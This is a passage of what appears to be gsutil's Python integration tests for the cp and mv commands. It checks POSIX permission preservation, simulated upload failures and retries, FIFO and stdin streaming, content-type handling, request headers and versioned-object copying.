is_cp: Whether or not the calling test suite is cp or mv.
"""
primary_gid = os.stat(tmpdir).st_gid
non_primary_gid = util.GetNonPrimaryGid()
test_params = {
'obj1': {
GID_ATTR: primary_gid
},
'obj2': {
GID_ATTR: non_primary_gid
},
'obj3': {
GID_ATTR: primary_gid,
MODE_ATTR: '440'
},
'obj4': {
GID_ATTR: non_primary_gid,
MODE_ATTR: '444'
},
'obj5': {
UID_ATTR: USER_ID
},
'obj6': {
UID_ATTR: USER_ID,
MODE_ATTR: '420'
},
'obj7': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid
},
'obj8': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid
},
'obj9': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid,
MODE_ATTR: '433'
},
'obj10': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid,
MODE_ATTR: '442'
}
}
for obj_name, attrs_dict in six.iteritems(test_params):
uid = attrs_dict.get(UID_ATTR)
gid = attrs_dict.get(GID_ATTR)
mode = attrs_dict.get(MODE_ATTR)
cls.CreateObject(bucket_uri=bucket_uri,
object_name=obj_name,
contents=obj_name.encode(UTF8),
uid=uid,
gid=gid,
mode=mode)
for obj_name in six.iterkeys(test_params):
    # Move objects one at a time to avoid eventual listing consistency issues.
cls.RunGsUtil(
['cp' if is_cp else 'mv', '-P',
suri(bucket_uri, obj_name), tmpdir])
listing = TailSet(tmpdir, cls.FlatListDir(tmpdir))
cls.assertEquals(
listing,
set([
'/obj1', '/obj2', '/obj3', '/obj4', '/obj5', '/obj6', '/obj7',
'/obj8', '/obj9', '/obj10'
]))
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj1'),
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj2'),
gid=non_primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj3'),
gid=primary_gid,
mode=0o440)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj4'),
gid=non_primary_gid,
mode=0o444)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj5'),
uid=USER_ID,
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj6'),
uid=USER_ID,
gid=primary_gid,
mode=0o420)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj7'),
uid=USER_ID,
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj8'),
uid=USER_ID,
gid=non_primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj9'),
uid=USER_ID,
gid=primary_gid,
mode=0o433)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj10'),
uid=USER_ID,
gid=non_primary_gid,
mode=0o442)
def TestCpMvPOSIXLocalToBucketNoErrors(cls, bucket_uri, is_cp=True):
"""Helper function for testing local to bucket POSIX preservation.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket to cp/mv to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
primary_gid = os.getgid()
non_primary_gid = util.GetNonPrimaryGid()
test_params = {
'obj1': {
GID_ATTR: primary_gid
},
'obj2': {
GID_ATTR: non_primary_gid
},
'obj3': {
GID_ATTR: primary_gid,
MODE_ATTR: '440'
},
'obj4': {
GID_ATTR: non_primary_gid,
MODE_ATTR: '444'
},
'obj5': {
UID_ATTR: USER_ID
},
'obj6': {
UID_ATTR: USER_ID,
MODE_ATTR: '420'
},
'obj7': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid
},
'obj8': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid
},
'obj9': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid,
MODE_ATTR: '433'
},
'obj10': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid,
MODE_ATTR: '442'
}
}
for obj_name, attrs_dict in six.iteritems(test_params):
uid = attrs_dict.get(UID_ATTR, NA_ID)
gid = attrs_dict.get(GID_ATTR, NA_ID)
mode = attrs_dict.get(MODE_ATTR, NA_MODE)
if mode != NA_MODE:
ValidatePOSIXMode(int(mode, 8))
ValidateFilePermissionAccess(obj_name,
uid=uid,
gid=int(gid),
mode=int(mode))
fpath = cls.CreateTempFile(contents=b'foo', uid=uid, gid=gid, mode=mode)
cls.RunGsUtil(
['cp' if is_cp else 'mv', '-P', fpath,
suri(bucket_uri, obj_name)])
if uid != NA_ID:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
UID_ATTR, str(uid))
if gid != NA_ID:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
GID_ATTR, str(gid))
if mode != NA_MODE:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
MODE_ATTR, str(mode))
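# The FIFO helpers below are run in background threads because opening a FIFO
# blocks until both a reader and a writer are attached; the tests join the
# threads with a timeout to avoid hanging if one side fails.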
def _ReadContentsFromFifo(fifo_path, list_for_output):
with open(fifo_path, 'rb') as f:
list_for_output.append(f.read())
def _WriteContentsToFifo(contents, fifo_path):
with open(fifo_path, 'wb') as f:
f.write(contents)
class _JSONForceHTTPErrorCopyCallbackHandler(object):
"""Test callback handler that raises an arbitrary HTTP error exception."""
def __init__(self, startover_at_byte, http_error_num):
self._startover_at_byte = startover_at_byte
self._http_error_num = http_error_num
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write('Forcing HTTP error %s after byte %s. '
'%s/%s transferred.\r\n' %
(self._http_error_num, self._startover_at_byte,
MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise apitools_exceptions.HttpError({'status': self._http_error_num},
None, None)
class _XMLResumableUploadStartOverCopyCallbackHandler(object):
"""Test callback handler that raises start-over exception during upload."""
def __init__(self, startover_at_byte):
self._startover_at_byte = startover_at_byte
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write(
'Forcing ResumableUpload start over error after byte %s. '
'%s/%s transferred.\r\n' %
(self._startover_at_byte, MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise boto.exception.ResumableUploadException(
'Forcing upload start over', ResumableTransferDisposition.START_OVER)
class _DeleteBucketThenStartOverCopyCallbackHandler(object):
"""Test callback handler that deletes bucket then raises start-over."""
def __init__(self, startover_at_byte, bucket_uri):
self._startover_at_byte = startover_at_byte
self._bucket_uri = bucket_uri
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write('Deleting bucket (%s)' % (self._bucket_uri.bucket_name))
@Retry(StorageResponseError, tries=5, timeout_secs=1)
def DeleteBucket():
bucket_list = list(self._bucket_uri.list_bucket(all_versions=True))
for k in bucket_list:
self._bucket_uri.get_bucket().delete_key(k.name,
version_id=k.version_id)
self._bucket_uri.delete_bucket()
DeleteBucket()
sys.stderr.write(
'Forcing ResumableUpload start over error after byte %s. '
'%s/%s transferred.\r\n' %
(self._startover_at_byte, MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise ResumableUploadStartOverException('Artificially forcing start-over')
class _ResumableUploadRetryHandler(object):
"""Test callback handler for causing retries during a resumable transfer."""
def __init__(self,
retry_at_byte,
exception_to_raise,
exc_args,
num_retries=1):
self._retry_at_byte = retry_at_byte
self._exception_to_raise = exception_to_raise
self._exception_args = exc_args
self._num_retries = num_retries
self._retries_made = 0
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, unused_total_size):
"""Cause a single retry at the retry point."""
if (total_bytes_transferred >= self._retry_at_byte and
self._retries_made < self._num_retries):
self._retries_made += 1
raise self._exception_to_raise(*self._exception_args)
class TestCp(testcase.GsUtilIntegrationTestCase):
"""Integration tests for cp command."""
# For tests that artificially halt, we need to ensure at least one callback
# occurs.
halt_size = START_CALLBACK_PER_BYTES * 2
def _get_test_file(self, name):
contents = pkgutil.get_data('gslib', 'tests/test_data/%s' % name)
return self.CreateTempFile(file_name=name, contents=contents)
def _CpWithFifoViaGsUtilAndAppendOutputToList(self, src_path_tuple, dst_path,
list_for_return_value,
**kwargs):
arg_list = ['cp']
arg_list.extend(src_path_tuple)
arg_list.append(dst_path)
# Append stderr, stdout, or return status (if specified in kwargs) to the
# given list.
list_for_return_value.append(self.RunGsUtil(arg_list, **kwargs))
@SequentialAndParallelTransfer
def test_noclobber(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'bar')
stderr = self.RunGsUtil(
['cp', '-n', fpath, suri(key_uri)], return_stderr=True)
self.assertIn('Skipping existing item: %s' % suri(key_uri), stderr)
self.assertEqual(key_uri.get_contents_as_string(), b'foo')
stderr = self.RunGsUtil(['cp', '-n', suri(key_uri), fpath],
return_stderr=True)
with open(fpath, 'rb') as f:
self.assertIn('Skipping existing item: %s' % suri(f), stderr)
self.assertEqual(f.read(), b'bar')
@SequentialAndParallelTransfer
def test_noclobber_different_size(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'quux')
stderr = self.RunGsUtil(
['cp', '-n', fpath, suri(key_uri)], return_stderr=True)
self.assertIn('Skipping existing item: %s' % suri(key_uri), stderr)
self.assertEqual(key_uri.get_contents_as_string(), b'foo')
stderr = self.RunGsUtil(['cp', '-n', suri(key_uri), fpath],
return_stderr=True)
with open(fpath, 'rb') as f:
self.assertIn('Skipping existing item: %s' % suri(f), stderr)
self.assertEqual(f.read(), b'quux')
def test_dest_bucket_not_exist(self):
fpath = self.CreateTempFile(contents=b'foo')
invalid_bucket_uri = ('%s://%s' %
(self.default_provider, self.nonexistent_bucket_name))
# TODO(b/135780661): Remove retry after bug resolved
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
stderr = self.RunGsUtil(['cp', fpath, invalid_bucket_uri],
expected_status=1,
return_stderr=True)
self.assertIn('does not exist', stderr)
_Check()
def test_copy_in_cloud_noclobber(self):
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
stderr = self.RunGsUtil(
['cp', suri(key_uri), suri(bucket2_uri)], return_stderr=True)
# Rewrite API may output an additional 'Copying' progress notification.
self.assertGreaterEqual(stderr.count('Copying'), 1)
self.assertLessEqual(stderr.count('Copying'), 2)
stderr = self.RunGsUtil(
['cp', '-n', suri(key_uri),
suri(bucket2_uri)], return_stderr=True)
self.assertIn(
'Skipping existing item: %s' % suri(bucket2_uri, key_uri.object_name),
stderr)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_local_file_to_fifo(self):
contents = b'bar'
fifo_path = self.CreateTempFifo()
file_path = self.CreateTempFile(contents=contents)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((file_path,), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_one_object_to_fifo(self):
fifo_path = self.CreateTempFifo()
bucket_uri = self.CreateBucket()
contents = b'bar'
obj_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((suri(obj_uri),), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_multiple_objects_to_fifo(self):
fifo_path = self.CreateTempFifo()
bucket_uri = self.CreateBucket()
contents1 = b'foo and bar'
contents2 = b'baz and qux'
obj1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents1)
obj2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents2)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((suri(obj1_uri), suri(obj2_uri)), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertIn(contents1, list_for_output[0])
self.assertIn(contents2, list_for_output[0])
@SequentialAndParallelTransfer
def test_streaming(self):
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(
['cp', '-', '%s' % suri(bucket_uri, 'foo')],
stdin='bar',
return_stderr=True)
self.assertIn('Copying from <STDIN>', stderr)
key_uri = self.StorageUriCloneReplaceName(bucket_uri, 'foo')
self.assertEqual(key_uri.get_contents_as_string(), b'bar')
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_fifo_to_object(self):
bucket_uri = self.CreateBucket()
fifo_path = self.CreateTempFifo()
object_name = 'foo'
object_contents = b'bar'
list_for_output = []
# Start writer in the background, which won't finish until a corresponding
# read operation is performed on the fifo.
write_thread = threading.Thread(target=_WriteContentsToFifo,
args=(object_contents, fifo_path))
write_thread.start()
# The fifo requires both a pending read and write before either operation
# will complete. Regardless of which operation occurs first, the
# corresponding subsequent operation will unblock the first one.
# We run gsutil in a thread so that it can timeout rather than hang forever
# if the write thread fails.
read_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((fifo_path,), suri(bucket_uri, object_name), list_for_output),
kwargs={'return_stderr': True})
read_thread.start()
read_thread.join(120)
write_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertIn('Copying from named pipe', list_for_output[0])
key_uri = self.StorageUriCloneReplaceName(bucket_uri, object_name)
self.assertEqual(key_uri.get_contents_as_string(), object_contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_fifo_to_stdout(self):
fifo_path = self.CreateTempFifo()
contents = b'bar'
list_for_output = []
write_thread = threading.Thread(target=_WriteContentsToFifo,
args=(contents, fifo_path))
write_thread.start()
read_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((fifo_path,), '-', list_for_output),
kwargs={'return_stdout': True})
read_thread.start()
read_thread.join(120)
write_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip().encode('ascii'), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_stdout_to_fifo(self):
fifo_path = self.CreateTempFifo()
contents = b'bar'
list_for_output = []
list_for_gsutil_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=(('-',), fifo_path, list_for_gsutil_output),
kwargs={
'return_stderr': True,
'stdin': contents
})
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
def test_streaming_multiple_arguments(self):
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(['cp', '-', '-', suri(bucket_uri)],
stdin='bar',
return_stderr=True,
expected_status=1)
self.assertIn('Multiple URL strings are not supported with streaming',
stderr)
# TODO: Implement a way to test both with and without using magic file.
@SequentialAndParallelTransfer
def test_detect_content_type(self):
"""Tests local detection of content type."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil(['cp', self._get_test_file('test.mp3'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
if IS_WINDOWS:
self.assertTrue(
re.search(r'Content-Type:\s+audio/x-mpg', stdout) or
re.search(r'Content-Type:\s+audio/mpeg', stdout))
else:
self.assertRegex(stdout, r'Content-Type:\s+audio/mpeg')
_Check1()
self.RunGsUtil(['cp', self._get_test_file('test.gif'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check2()
def test_content_type_override_default(self):
"""Tests overriding content type with the default value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil(
['-h', 'Content-Type:', 'cp',
self._get_test_file('test.mp3'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+application/octet-stream')
_Check1()
self.RunGsUtil(
['-h', 'Content-Type:', 'cp',
self._get_test_file('test.gif'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+application/octet-stream')
_Check2()
def test_content_type_override(self):
"""Tests overriding content type with a value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil([
'-h', 'Content-Type:text/plain', 'cp',
self._get_test_file('test.mp3'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
_Check1()
self.RunGsUtil([
'-h', 'Content-Type:text/plain', 'cp',
self._get_test_file('test.gif'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
_Check2()
@unittest.skipIf(IS_WINDOWS, 'magicfile is not available on Windows.')
@SequentialAndParallelTransfer
def test_magicfile_override(self):
"""Tests content type override with magicfile value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'foo/bar\n')
self.RunGsUtil(['cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
use_magicfile = boto.config.getbool('GSUtil', 'use_magicfile', False)
content_type = ('text/plain'
if use_magicfile else 'application/octet-stream')
self.assertRegex(stdout, r'Content-Type:\s+%s' % content_type)
_Check1()
@SequentialAndParallelTransfer
def test_content_type_mismatches(self):
"""Tests overriding content type when it does not match the file type."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'foo/bar\n')
self.RunGsUtil([
'-h', 'Content-Type:image/gif', 'cp',
self._get_test_file('test.mp3'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check1()
self.RunGsUtil([
'-h', 'Content-Type:image/gif', 'cp',
self._get_test_file('test.gif'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check2()
self.RunGsUtil(['-h', 'Content-Type:image/gif', 'cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check3():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check3()
@SequentialAndParallelTransfer
def test_content_type_header_case_insensitive(self):
"""Tests that content type header is treated with case insensitivity."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
self.RunGsUtil(['-h', 'content-Type:text/plain', 'cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
self.assertNotRegex(stdout, r'image/gif')
_Check1()
self.RunGsUtil([
'-h', 'CONTENT-TYPE:image/gif', '-h', 'content-type:image/gif', 'cp',
fpath, dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
self.assertNotRegex(stdout, r'image/gif,\s*image/gif')
_Check2()
@SequentialAndParallelTransfer
def test_other_headers(self):
"""Tests that non-content-type headers are applied successfully on copy."""
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
self.RunGsUtil([
'-h', 'Cache-Control:public,max-age=12', '-h',
'x-%s-meta-1:abcd' % self.provider_custom_meta, 'cp', fpath, dst_uri
])
stdout = self.RunGsUtil(['ls', '-L', dst_uri], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control\s*:\s*public,max-age=12')
self.assertRegex(stdout, r'Metadata:\s*1:\s*abcd')
dst_uri2 = suri(bucket_uri, 'bar')
self.RunGsUtil(['cp', dst_uri, dst_uri2])
# Ensure metadata was preserved across copy.
stdout = self.RunGsUtil(['ls', '-L', dst_uri2], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control\s*:\s*public,max-age=12')
self.assertRegex(stdout, r'Metadata:\s*1:\s*abcd')
@SequentialAndParallelTransfer
def test_request_reason_header(self):
"""Test that x-goog-request-header can be set using the environment variable."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
    # Ensure the x-goog-request-reason header is sent by the cp command
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
self.assertRegex(stderr,
r'\'x-goog-request-reason\': \'b/this_is_env_reason\'')
    # Ensure the x-goog-request-reason header is sent by the ls command
stderr = self.RunGsUtil(['-D', 'ls', '-L', dst_uri], return_stderr=True)
self.assertRegex(stderr,
r'\'x-goog-request-reason\': \'b/this_is_env_reason\'')
@SequentialAndParallelTransfer
@SkipForXML('XML APIs use a different debug log format.')
def test_request_reason_header_persists_multiple_requests_json(self):
"""Test that x-goog-request-header works when cp sends multiple requests."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
boto_config_for_test = ('GSUtil', 'resumable_threshold', '0')
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
# PUT follows GET request. Both need the request-reason header.
reason_regex = (r'Making http GET[\s\S]*'
r'x-goog-request-reason\': \'b/this_is_env_reason[\s\S]*'
r'send: (b\')?PUT[\s\S]*x-goog-request-reason:'
r' b/this_is_env_reason')
self.assertRegex(stderr, reason_regex)
@SequentialAndParallelTransfer
@SkipForJSON('JSON API uses a different debug log format.')
def test_request_reason_header_persists_multiple_requests_xml(self):
"""Test that x-goog-request-header works when cp sends multiple requests."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
boto_config_for_test = ('GSUtil', 'resumable_threshold', '0')
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
reason_regex = (
r'Final headers: \{[\s\S]*\''
r'x-goog-request-reason\': \'b/this_is_env_reason\'[\s\S]*}')
# Pattern should match twice since two requests should have a reason header.
self.assertRegex(stderr, reason_regex + r'[\s\S]*' + reason_regex)
@SequentialAndParallelTransfer
def test_versioning(self):
"""Tests copy with versioning."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data2')
k2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
g1 = urigen(k2_uri)
self.RunGsUtil(['cp', suri(k1_uri), suri(k2_uri)])
k2_uri = self.StorageUriCloneReplaceName(bucket_uri, k2_uri.object_name)
k2_uri = self.StorageUriCloneReplaceKey(bucket_uri, k2_uri.get_key())
g2 = urigen(k2_uri)
self.StorageUriSetContentsFromString(k2_uri, 'data3')
g3 = urigen(k2_uri)
fpath = self.CreateTempFile()
# Check to make sure current version is data3.
self.RunGsUtil(['cp', k2_uri.versionless_uri, fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data3')
# Check contents of all three versions
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g1), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data1')
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g2), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data2')
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g3), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data3')
# Copy first version to current and verify.
self.RunGsUtil(
['cp',
'%s#%s' % (k2_uri.versionless_uri, g1), k2_uri.versionless_uri])
self.RunGsUtil(['cp', k2_uri.versionless_uri, fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data1')
# Attempt to specify a version-specific URI for destination.
stderr = self.RunGsUtil(['cp', fpath, k2_uri.uri],
return_stderr=True,
expected_status=1)
self.assertIn('cannot be the destination for gsutil cp', stderr)
def test_versioning_no_parallelism(self):
"""Tests that copy all-versions errors when parallelism is enabled."""
# TODO(b/135780661): Remove retry after bug resolved
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
stderr = self.RunGsUtil([
'-m', 'cp', '-A',
suri(self.nonexistent_bucket_name, 'foo'),
suri(self.nonexistent_bucket_name, 'bar')
],
expected_status=1,
return_stderr=True)
self.assertIn('-m option is not supported with the cp -A flag', stderr)
_Check()
@SkipForS3('S3 lists versioned objects in reverse timestamp order.')
def test_recursive_copying_versioned_bucket(self):
"""Tests cp -R with versioned buckets."""
bucket1_uri = self.CreateVersionedBucket()
bucket2_uri = self.CreateVersionedBucket()
bucket3_uri = self.CreateVersionedBucket()
# Write two versions of an object to the bucket1.
v1_uri = self.CreateObject(bucket_uri=bucket1_uri,
object_name='k',
contents=b'data0')
self.CreateObject(bucket_uri=bucket1_uri,
object_name='k',
contents=b'longer_data1',
gs_idempotent_generation=urigen(v1_uri))
self.AssertNObjectsInBucket(bucket1_uri, 2, versioned=True)
self.AssertNObjectsInBucket(bucket2_uri, 0, versioned=True)
self.AssertNObjectsInBucket(bucket3_uri, 0, versioned=True)
# Recursively copy to second versioned bucket.
# -A flag should copy all versions in order.
self.RunGsUtil(
['cp', '-R', '-A',
suri(bucket1_uri, '*'),
suri(bucket2_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
"""Validates the results of the cp -R."""
listing1 = self.RunGsUtil(['ls', '-la', suri(bucket1_uri)],
return_stdout=True).split('\n')
listing2 = self.RunGsUtil(['ls', '-la', suri(bucket2_uri)],
return_stdout=True).split('\n')
# 2 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing1), 4)
self.assertEquals(len(listing2), 4)
# First object in each bucket should match in size and version-less name.
size1, _, uri_str1, _ = listing1[0].split()
self.assertEquals(size1, str(len('data0')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
size2, _, uri_str2, _ = listing2[0].split()
self.assertEquals(size2, str(len('data0')))
self.assertEquals(storage_uri(uri_str2).object_name, 'k')
# Similarly for second object in each bucket.
size1, _, uri_str1, _ = listing1[1].split()
self.assertEquals(size1, str(len('longer_data1')))
